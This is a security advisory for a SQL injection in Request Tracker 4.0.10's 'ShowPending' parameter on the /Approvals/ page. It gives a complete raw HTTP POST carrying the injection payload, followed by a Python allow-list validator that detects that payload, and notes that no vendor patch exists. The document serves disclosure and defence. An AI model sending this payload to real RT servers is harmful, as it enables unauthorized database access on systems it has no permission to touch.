Request Tracker 'showpending' parameter SQL Injection Vulnerability
Release date:
Updated on: 2013-04-13
Affected Systems:
Bestpractical RT 4.0.10
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59022
Request Tracker (RT) is an issue tracking system used for bug tracking, customer service, workflow processing, change management, network operations and youth mentoring.
RT 4.0.10 is vulnerable to SQL injection through the 'ShowPending' parameter of the /Approvals/ page. After successful exploitation, an attacker can perform unauthorized database operations.
Source: cheki
Test method:
--------------------------------------------------------------------------------
Alert
The following procedure (method) may be offensive in nature and is intended only for security research and teaching. Use at your own risk!
POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0%239b%557f024cc1cb
Accept-Language: en-US
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8
Referer: http://www.example.com/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=
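The request above shows that the /Approvals/ form only carries four checkbox flags and two date fields, so a strict allow-list on those parameters is enough to reject the injected value. The following validator is an added example (not RT's own code) that applies such a check to a raw urlencoded body; the field names come from the request above, while the accepted value shapes (0/1 flags, YYYY-MM-DD dates) are assumptions for the sake of illustration.

```python
import re
from urllib.parse import parse_qsl

# Field names as they appear in the advisory's POST body. The accepted
# shapes are assumed here: checkbox flags are "", "0" or "1"; dates are
# empty or YYYY-MM-DD. Anything else is reported rather than passed on.
FLAG_FIELDS = {"ShowPending", "ShowResolved", "ShowRejected", "ShowDependent"}
DATE_FIELDS = {"CreatedBefore", "CreatedAfter"}
FLAG_OK = {"", "0", "1"}
DATE_OK = re.compile(r"^(\d{4}-\d{2}-\d{2})?$")


def validate_approvals_body(body):
    """Return a list of findings for a raw application/x-www-form-urlencoded
    body; an empty list means every parameter has the expected shape.
    parse_qsl decodes %XX escapes and '+' before the values are checked,
    so the check runs on what the application would actually see."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in FLAG_FIELDS:
            if value not in FLAG_OK:
                findings.append(f"{name}: unexpected flag value {value!r}")
        elif name in DATE_FIELDS:
            if not DATE_OK.match(value):
                findings.append(f"{name}: unexpected date value {value!r}")
        else:
            findings.append(f"{name}: parameter not on the form allow-list")
    return findings


# Constructed sample bodies: the advisory's payload and a benign submission
# of the same form.
INJECTED_BODY = ("ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1"
                 "&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=")
BENIGN_BODY = ("ShowPending=1&ShowResolved=0&ShowRejected=0&ShowDependent=1"
               "&CreatedBefore=2013-04-01&CreatedAfter=")

if __name__ == "__main__":
    for label, body in (("injected", INJECTED_BODY), ("benign", BENIGN_BODY)):
        print(label, validate_approvals_body(body) or "ok")
```

The same allow-list can be applied server-side before any of these values reach a query, which removes the injection regardless of how the SQL is assembled.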
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Bestpractical
-------------
At the time of writing, the vendor has not provided a patch or upgrade. Users of this software are advised to check the vendor's homepage for the latest version:
http://www.bestpractical.com/rt/